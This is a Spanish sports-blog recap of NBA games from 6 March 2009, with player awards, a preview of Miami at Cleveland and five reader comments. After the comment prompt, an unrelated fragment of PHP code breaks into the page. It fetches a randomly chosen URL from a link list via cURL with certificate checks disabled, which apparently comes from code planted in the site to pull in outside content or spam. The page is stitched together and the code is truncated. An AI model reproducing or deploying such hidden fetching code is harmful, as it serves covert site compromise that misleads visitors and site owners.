La crónica (6/03/2009)

07 de March de 2009 por TheDeerHunter

By TheDeerHunter&Viva

Como cada sábado, tenemos serias dificultades de sintetizar una jornada tan intensa.

Un choque destaca sobre todos los demás. Los Celtics recibían la visita de los Cavs con el cuchillo entre los dientes. Una victoria foránea hubiera puesto la ventaja campo muy cuesta arriba de aquí a final de temporada y Garnett viendo el partido desde la grada, con una bufanda demasiado parecida a los colores rivales. La defensa que le suelen aplicar los verdes al Elegido suele ser de libro y anoche no fue diferente. Tampoco lo que le sube la bilirrubina a Pierce cuando se enfrenta con él. Sí lo es algo más que Powe te haga un destrozo de 20ptos 11rebotes. Por ahí se ve que el sistema defensivo de los Cavs sí echa de menos el trabajo defensivo del viejo Ben. Un dato adicional sobre el debate que abrimos el otro día sobre la ventaja campo: En ninguno de los últimos 15 partidos en los que se han enfrentado ambos equipos ha sido capaz de ganar el equipo visitante. Aviso para navegantes.

El otro duelo a seguir que recomendábamos ayer era el Shaq Vs Yao, en el que el smal-ball de Gentry terminó permitiendo que interviniera Scola y que el verdadero duelo del partido fuera Nash Vs Aaron Brooks. Los Rockets estuvieron colectivamente más precisos y los Suns se quedan con medio pie fuera de Play Offs.

Otros focos de interés fueron Salt Lake, donde los Jazz testeaban su reacción contra uno de los mejores equipos de la temporada, los Nuggets. Mal la pareja Billups-Carmelo y muy mal la Nené-Petro sin K. Martin. 10ª seguida para Williams y sus gladiadores.

Fundamental el seguimiento a los candidatos a MVP. Jugaron todos menos CP3, que no tenemos claro si puede entrar en tal quiniela. Ganaron todos y con actuaciones destacadas. Si nos ceñimos a este momento no puede haber color y se lo llevará Wade de calle. Anoche otra maravilla de partido que ganó en Toronto con un Calderón tristísimo. Howard tuvo más problemas a la hora de doblegar a New Jersey y Kobe se paseó sin más contra los Wolves. Lo que está claro es que ahora mismo merecería más la pena pagar una entrada por ver a Wade hacer su magia que a cualquiera de los otros.

Tras todo lo anterior, un Atlanta@Charlotte o un Chicago@Milwaukee parecen platos menores a pesar de estar jugándose lo que se juegan. Tropezón de los Hawks y victoria de los Bulls, que deja un poquito más en su sitio a los pobres Bucks.

Por último, los Pistons ganaron a los Warriors y los Spurs hicieron lo propio con los Wizards.

PREMIOS

MVP: Como cada sábado tenemos variedad y calidad. En partidos apretados decidieron D.Howard con 26-15 y un sorprendente 12 de 14 en tiros libres, Brooks haciendo 30-3-3 frente a Nash y Deron Williams a pesar de sus 6 pérdidas acabó con 25-4-11. En el partido de la jornada Pierce superó a Lebron y acabo con 29 puntos, 4 rebotes y 9 asistencias. Ben Gordon acercó a los Bulls a play-offs con un 34-4-7. Pero nadie puede con el jugador de moda, Dwyane Wade acabó el partido contra los Raptors con 42 puntos, 6 rebotes, 8 asistencias (también 8 pérdidas) y un 74% en tiros de campo, nivel sideral el de este chico.

Rookie: Hoy es cosa de 3; Kevin Love fue el mejor de su equipo frente a los Lakers con 18 puntos y 14 rebotes aunque sigue teniendo problemas con los porcentajes de tiro, ayer 5 de 17. Derrick Rose fue el escudero de Gordon con 27 puntos y 6 asistencias y porcentajes por encima del 50%. Pero nuestro premio va para Mbah a Moute que volvió a jugar muchos minutos y dejó una tarjeta de 21 puntos, 11 rebotes y 5 robos con un casi perfecto 7 de 8 en tiros de campo.

SorpresaAaron Brooks fue el máximo anotador de los Rockets con 30 puntos, Leon Powe en 26 minutos hizo un 20-11, los banquillos de Spurs y Pistons hicieron 56 y 48 puntos respectivamente y R.Balkman hizo 9 puntos y 14 rebotes. Pero queremos hacer eco de un jugador que apuntaba a bluff, Joakim Noah en los últimos diez partidos tiene unos números de 8.6 puntos, 10.3 rebotes, 1.7 tapones con un 50% en tiros de campo, ayer volvió a ser el máximo reboteador del partido.

Decepción: Con todos los focos mirando Lebron James hizo un partido flojo, con 5 de 15 en tiros y 4 pérdidas, en su defensa podemos decir que no acaparó mucho el balón y no se cegó en jugadas personales. En la derrota de los Suns G.Hill fue de gran ayuda para los Bulls al anotar 0 puntos en 25 minutos.

Mayor esfuerzo en Vano: JR Smith lideró a Denver 27-4-5 pero no sirvió para tumbar a los Jazzs. Devin Harris hizo 25-4-9 pero ni Carter ni Lopez le ayudaron demasiado. Y por encima de 30 puntos se fueron Bosh y Nash, el primero añadió 7 rebotes, 4 asistencias y 2 tapones sin perdidas de balón, y el segundo cogió 5 rebotes (los mismos que Shaq) y dió 13 asistencias (casi el doble que el resto del equipo junto).

RAZONES PARA TRASNOCHAR

Hoy es Sabado y cualquier razón es buena para trasnochar… pero si lo que queréis es disfrutar de un buen partido de baloncesto tenemos ni más ni menos el Miami@Cleveland, o lo que es lo mismo, Flash contra The Chosen y el duelo individual más potente que puede verse literalmente en el planeta. Wade, atravesando un momento increíble tratará de emular a Kobe, el único que ha sido capaz de profanar el baluarte Cavalier. La lástima es que es a la 1:30h, por lo que hoy será una gran ocasión para decirle a nuestras respectivas parejas aquello de “Hoy cariño, es a mí a quien le duele la cabeza…”

El jugador al que recomendamos hoy seguir, además de los evidentes… Wade, Lebron o CP3 será a Charlie Villanueva. Hoy se enfrenta a los Warriors… y todos sabemos lo que significa individualmente eso. Él ha personificado la reacción de Milwaukee en frente del aluvión de dificultades que les ha acontecido esta temporada y todavía se mantienen en la pelea por la última plaza del este a pesar de todo. Sus números durante los últimos 10 partidos no son nada malos: 20ptos, 7,7 reb y 2,7asist.

Comenta

5 comentarios a esta entrada

  1. Jabho dice:
    #1

    Pues una como decís en la crónica una victoria de los Cavs hubiera sido clave por muchas razones. Casi se hubieran asegurado el primer puesto, moralmente hubieran hecho mucho daño a los C´s que han perdido últimamente con Lakers y ellos mismos… El caso es que sin Garnett y con Pierce y Ray muy mal el primer tiempo los Cavs no estuvieron a la altura. La segunda parte de Pierce fue brutal…. Los C´s dieron un golpe de autoridad y cuando estan a este nivel, cuando el banco cumple tan bien la sensación es que van a poder con cualquiera, porque atrás defienden muy, muy bien.

    El otro decía Viva que Lebron le falta conocimiento del juego, al menos respecto a Wade. Yo creo que no, pero anoche estuvo muy torpe…. Aun así, sigo sin pensar que Wade es superior a LeBron.

    Del resto me alegro que destaquéis a Noah porque es verdad que bueno, no será una estrella pero va despegando. Los bulls en puestos de PO y creo que ya no saldrán de ahí…

      Citar

  2. UnderlocK dice:
    #2

    Espectacular la temporada de Wade, no voy a entrar en comparaciones entre LeBron o Kobe, porque son jugadores distintos, pero este tio es un fuera de serie. Cuando su equipo no responde, él se lo echa a la espalda y es imparable. Ojito en playoffs que estará super motivado y despues de varias temporadas entre lesiones y si los demas aportan como con el partido ante los Suns y él esta fino pueden dar muchas sorpresas en la postemporada.

      Citar

  3. Dantley2 dice:
    #3

    Lo de Brooks no es tan sorprendente, cualquier base lento sufre horrores con él y Nash es rápido de cabeza pero no de piernas. El “pero” de Brooks es su poco cuerpo en defensa.

    Lo de Wade impresionante. Parece imparable ahora mismo.

    Y por lo que decís pinta un 4-3 en la final de la Este, parece que les da miedo salir de casa.

      Citar

  4. Landrusski dice:
    #4

    El amigo Lebron es bastante bastante bueno,pero esta un escalon por debajo de bryant porke no tiene ni la tecnica ni el conocimiento del juego de kobe.Para empezar lebron basa su juego en su superioridad fisica,esto le permite zafarse de sus contrarios y machacar el aro,pero si como ayer le defiendes muy bien y encima tienes tan poco conocimiento del juego de pedir siempre el pick & roll para atraerte a 2 jugadores en vez de buscar el 1 vs 1 ke es donde lebron destaca pasa lo ke pasa(te comes un rosco),por eso kobe o incluso wade son mejores k el a mi forma de ver…por cierto maurice williams me encanta,pedazo de anotador

      Citar

  5. Viva_Dirk dice:
    #5

    Venia yo a hablar de Mo Williams. Si algo podemos sacar del partido de ayer positivo para los Cavs es el, que esta respondiendo de forma increible como segunda espada. Esta en casi 18 puntos por encuentro con un 47% en tiros de campo, 42% en triples y 93.5% en tiros libres, además esta siendo capaz de hacer algo que se dudaba de el que es soltar la bola y dejar a Lebron que haga de organizador del juego.

    En fin, creo que fue un movimiento acertadísimo de los Cavs y Williams está respondiendo a la perfección.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>